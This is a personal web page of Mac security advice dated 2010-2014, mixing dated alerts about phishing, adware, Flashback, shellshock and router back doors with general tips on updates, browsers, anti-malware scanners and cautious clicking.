Security

Briefly:

Install updates 
Click cautiously
Use Chrome or Firefox 
Backup

Urgent

(Nov 2014) Even more security holes have been found in Macs. Be very suspicious if a dialogue pops up asking you for passwords or information, or telling you that you need to update some software.

(Oct 2014) There have been lots of scary news articles about Mac security recently. The "shellshock" vulnerability was actually not much threat to Mac users who don't meddle with advanced settings. The "iWorm" malware only hit those Mac users who installed pirated software -- don't do that. The "POODLE" bug allowed bad guys to hijack your HTTPS sessions and steal your credentials if you used an untrusted WiFi connection -- don't do that either. Apple released fixes for shellshock and POODLE, and updated its download protection against iWorm.

(Sep 2014) I got a very realistic fake email claiming to be from Apple: it said "the password for your AppleID has been reset. if this wasn't you, go to this link and set it back." Many other people are getting this too. I noticed that the link in the mail didn't go to Apple. If I had clicked, they would have asked for my old password and security questions and been able to steal money from me, look at my online data and pictures, and get more mail addresses to attack others. If you get a message like this, don't click. Open up iCloud.com by typing the name in the address bar -- only from a safe WiFi or wired connection (also check that the lock shows in the URL bar) and verify that your old password is still good.

(Jul 2014) I am getting phishing email that claims to be from EZ-Pass. It says "You have not paid for driving on a toll road. This invoice is sent repeatedly." The first one was sent from a web server in Germany. Another was sent from England. They are trying to get me to click on a web page. No thanks.

(Jul 2014) Don't download software from CNet. It comes with stuff you didn't ask for, that hijacks your browser's search engine, installs adware, and who knows what else. (Story from MacInTouch, look for "spigot.") Don't download a program called "Geneio," which also inserts ads into pages you view with web browsers. Don't download a Safari extension called "Awesome Screenshot," which also inserts ads into pages you view with web browsers. Other sites that install adware with your downloads include Softonic and Download.com, and pirate torrent sites.

(Jan 2014) Some home routers have "back doors" built into them by their manufacturers. Make sure yours isn't one. Here is a page with more detail on the problem. These back doors allow a bad guy to take over your router and silently redirect your web browsing to fake sites. They could spoof your online banking site and steal your money, or do other bad things. If your router has a manufacturer back door, replace it. On your Mac, change your DNS servers from the default to OpenDNS or Google DNS. On your router, put a password on your Wi-Fi network, change your router passwords from the vendor default, and disable external management. If you use a router you do not control, like public Wi-Fi, it could be hacked: use HTTPS browsing only, and be cautious.

Criminals are working hard to get you to run their programs on your Mac. If you click on a link in a malicious e-mail or view a web page that contains an attack, your computer can be infected with malware. This can cost you money and time, get you in trouble with friends and the law, steal your identity, or mess up your computer.

If Facebook, or any web page, says you should install a Flash upgrade or a Video Codec, DON'T CLICK IT. Don't Install "Mac Defender", or similar fake anti-virus scareware.

Mac Specific Advice

To update Apple software, start with the  ► Software Update menu item. To update non-Apple software safely, restart your browser, type in the URL of the company website, e.g. java.com, and find and download the update. Adobe Flash has an "automatic update" option. Turn it on.

Here is a useful page on malware: Mac Malware Guide: Am I Infected? Also, please read my pages on Loss Protection and backup.

My Mac Security Practices

Because I am a "security guy," I put up with some inconvenience to keep my computers more secure. Everyone's security situation is different, and these tactics may be too much, or not enough, for people with different concerns. The measures you should take depend on what you are trying to defend against, and the value to you of the information on your computer that you want to protect. (Many of these measures also work or have analogues on other systems such as Linux and Unix.) Some of these steps may be too detailed for the general reader, but perhaps they will suggest the complexity of the security problem and the need to use multiple solutions.

Things I Am Not Doing Yet

Apple has produced Security Feature Guides for OS versions from 10.3 (Panther) to 10.6 (Snow Leopard) with advice from the NSA. They are very thorough. There are some security measures that I have not chosen, after considering my security risks:

General

Here is a good set of Safety Tips from Sophos.

Almost all malware programs out there are not actually viruses but Trojan Horses. That is, the threats are programs that trick YOU into typing your admin password and installing them. For example, if you get a mail message that says "From: Microsoft" and has a link to click that will update Microsoft Word, DON'T. Similarly for mail that appears to be from PayPal, EBay, or your bank. (Mail senders can be forged. Links in mail may not go where you think.) If you're browsing a web page and you get a popup window that wants you to update your Flash player, DON'T. (There are multiple fake updaters for Flash, some spread via Facebook.) There are current attacks on Macs that do these things.

I have written elsewhere about general suggestions on home computer security. Summary:

Use common sense. To avoid malware problems, use good sense when surfing and clicking. Don't enter sensitive information, like credit card numbers, into untrusted or insecure web pages. Be suspicious. Watch out for scams and fraud. Here is a nice article: Mac security: scams and fraud.

Anti-Malware Packages

I installed the free version of the ClamXAV anti-malware scanner on my Mac. This program does not splice into Mail or the file system to watch for new files: it only scans directories you point it at. So far it has not found any problems on my computer, when I use it to check attachments sent me by others.

Malware scanners can check your whole hard drive, or selected files, when you tell them to. Malware checkers attach themselves into programs on your computer, such as Mail, and check files when they enter your computer; to do this they have to hook into applications and system facilities in ways that the malware cannot bypass. Such hookups are sometimes broken by OS updates, or lead to problems using your computer, or consume excessive resources.

Anti-malware programs' definition files must be updated very often in order to be useful. Anti-malware companies constantly capture and analyze new malware that is designed to evade existing detectors. Then they update their malware definitions and detection methods, and make updates available to you. Your computer can be attacked before you get protection installed. Recently, there have been multiple malware variants released in a single day, faster than the anti-malware software can be updated to catch it. See Rich Mogull's article "Do You Need Mac Antivirus Software in 2013?" for his view.

Mac anti-malware packages are available from ESET, Sophos, Intego, F-Secure, PC Tools, BitDefender, McAfee, ClamXav, Norton, SecureMac, and Avast!. They all claim to the the best.

Beware: the bad guys are sending out spam email offering you fake anti-virus software. I get a couple of these a day. If you install it, it may pretend to work, while taking over your system.

Recent Mac Malware

(Jun 2014) A researcher demonstrated an attack that steals Comcast account credentials if you come within range of an "evil twin" hotspot. Somebody could set up an access point named "xfinity" or "att" and your device would believe the name and connect to it. AT&T configures iPhones to connect automatically to its hotspots. Configure your Mac and iPhone/iPad not to join networks without asking. If your device wants to connect to a network, be cautious; if it asks you for your account credentials, be aware that it could be a password stealer.

(Mar 2014) Microsoft announced that there is a security hole in Rich Text Format (RTF) files that hackers are actively exploiting. Don't click on any downloaded .rtf files, and stay tuned. See Microsoft Security Advisory KB 2953095.

(Jan 2014) There are "undelivered item" emails being sent that contain links that will install Mac malware without asking you for a password. The malware gives complete access to all files on your Mac to the bad guys, and lets them run any command, including installing more malware. Be vigilant, and use Firefox or Chrome instead of Safari.

(Jan 2014) Some users of the Chrome browser who installed third-party extensions are being flooded with spam, which could include ads that send the user to infection sources. This happens when spammers buy the rights to a formerly-trusted extension from the developer, and send an automatic update that adds the spamming. Be cautious about which browser add-ons you choose.

(11/29/13) Many people are getting forged mail or text messages, ostensibly from Google, saying "your mail has been hacked." Forged messages from UPS, banks, etc with ZIP attachments containing virus droppers are also spreading: I get a few a week. Don't open ZIP attachments unless you are sure they are not forged; scan such files for virus before using.

(08/06/13) There are new phishing scam emails: one that says "your account has been suspended" and appears to come from Apple and one that appears to be a connection request on LinkedIn. Don't Click Links In Email unless you are sure they are not forged.

(January 2013) Two vulnerabilities in Ruby on Rails made over 200,000 websites exploitable. Clicking on an infected website could lead to multiple attacks: some might try to spoof popup windows that ask for your password, and others might find a hole that can be exploited without asking. Hacking toolkits are expected to exploit both holes soon. Click cautiously and apply security patches when available.

(August 2012) More malware that can infect Macs has been discovered. Click cautiously and apply security patches when available.

(Apr-June 2012) The FBI is investigating cases where malware was installed on travelers' laptops through application software updates on hotel internet connections. Several Trojan Horse attacks are also being distributed via infected Microsoft Word files. Make sure you apply the latest update to Word 2011. (Only Snow Leopard and below are vulnerable to this attack.) There is also a serious security threat that attacks Macs that just visit an infected web page: the malware tries to steal financial passwords from your computer. It has been estimated that over 500,000 Macs have been infected. Protect your computer by installing the Apple update for Java from  ► Software Update. See the page on The Flashback Malware for detailed instructions.
(Jan 2014) There are still 22,000 Macs infected by Flashback.

(April 2012) There are recent attacks on Macs that send infected Word documents in e-mail attachments. These exploit a hole that Microsoft patched years ago. Make sure your Microsoft products are up-to-date, by using the built-in Microsoft updater.

(March 2012) The various incarnations of the Flashback Trojan use ever changing tricks to get you to install it. Vist a hacked website, and you may see dialog boxes requesting your admin password with various excuses (such as a fake password dialog box from "Software Update"), or you may see a request to accept a certificate that claims to be from Apple but is not. If you get fooled, you are in big trouble: the Trojan will install code into your browser so it can steal your banking passwords and watch your traffic. Many blogs have been hacked recently, to send malware to your browser or redirect it to a malicious page that does so. Using Firefox with FlashBlock and NoScript or Chrome with ScriptNo will help catch these attacks. OpenDNS will also prevent access to some malicious URLs. Make sure you have Java up to date, and do not accept fake (self signed) Apple certificates.

Don't Be Complacent

Macs used to have fewer security problems than Windows because hackers concentrated on the flaws in Windows, but those days have passed. Over time, Windows has improved, and Apple should be working hard to improve also. Mac OS, Windows, Linux, and other Unix descendants are all written in the C language using informal processes. Brilliant programmers have failed to produce secure systems using this approach in many years of trying.

It is your responsibility to keep informed about your computer's security. Attackers will continue to try new ways to break into your computer and your online accounts. Even if you were fully protected yesterday, some new attack might be discovered tomorrow.

I think Microsoft does a better job with their code auditing than folks like Apple do. We've only seen a scratching of the surface as far as Apple vulnerabilities because nobody cares to find them. There's nothing inherent with Apple themselves and their development.
-- Marc Maiffret, former hacker

Home | FAQ © 2010-2014, Tom Van Vleck updated 2014-11-13 11:47